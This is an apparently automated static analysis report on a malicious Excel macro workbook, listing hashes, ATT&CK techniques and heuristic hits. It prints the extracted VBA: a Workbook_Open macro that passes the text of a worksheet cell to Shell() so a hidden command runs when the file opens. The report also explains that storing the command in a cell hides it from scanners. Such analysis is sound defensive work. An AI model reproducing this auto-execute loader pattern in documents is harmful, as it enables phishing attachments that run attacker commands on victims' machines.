Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 952ae01cb23df3d0…

MALICIOUS

Office (OOXML)

Size: 16.3 KB
Created: 2020-06-23 05:03:50 UTC
Authoring application: Microsoft Excel 16.0300
First seen: 2021-09-18
MD5: 0890603b4e136a449cc0621f323e44e7
SHA-1: 7caa57f7dfc910dbab28e205b9715eda0044c072
SHA-256: 952ae01cb23df3d063f48a7f9991a62cfa5989a70f8c2c00f40d5fc6416d4eaa
Risk Score: 160

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment
  • T1203 Exploitation for Client Execution

The sample is an OOXML workbook whose ThisWorkbook module contains a Workbook_Open macro that calls the Shell() function, i.e. an attempt to execute a command automatically when the document is opened. The macro reads the contents of cell BG1 on Sheet1 and passes that string to Shell(), so the command itself is stored in worksheet data rather than in the VBA source; recovering it requires inspecting the sheet XML for that cell, not only the extracted macro. Storing the command in a cell is a common technique for downloading and executing a second-stage payload while keeping the macro body free of obvious strings.

Heuristics (4)

  • VBA project inside OOXML (severity: medium; 3 related findings; rule OOXML_VBA)
    Document contains a VBA project: VBA macros present.
  • Shell() call in VBA (severity: critical; rule OLE_VBA_SHELL)
    Shell() call in VBA.
  • Workbook_Open macro (severity: high; rule OLE_VBA_WBOPEN)
    Workbook_Open auto-execution macro.
  • VBA p-code auto-exec with execution tokens (severity: high; rule OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Artifact 1
  Filename: macros.bas
  Kind: vba-macro
  Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
  Size: 699 bytes
  SHA-256: 99f230b1bce0565b0932411892c2b608e4130bf8573d1a894fa9090fdb6bd42f

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()

End Sub
Data = Sheet1.Range("BG1")
Shell (Data)
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Artifact 2
  Filename: vbaProject_00.bin
  Kind: vba-project
  Source: OOXML VBA project: xl/vbaProject.bin
  Size: 8704 bytes
  SHA-256: f62f8ff156a95d0be7e35699a052270cf411e7a5a4182dd7dfab05c4e9ebaf51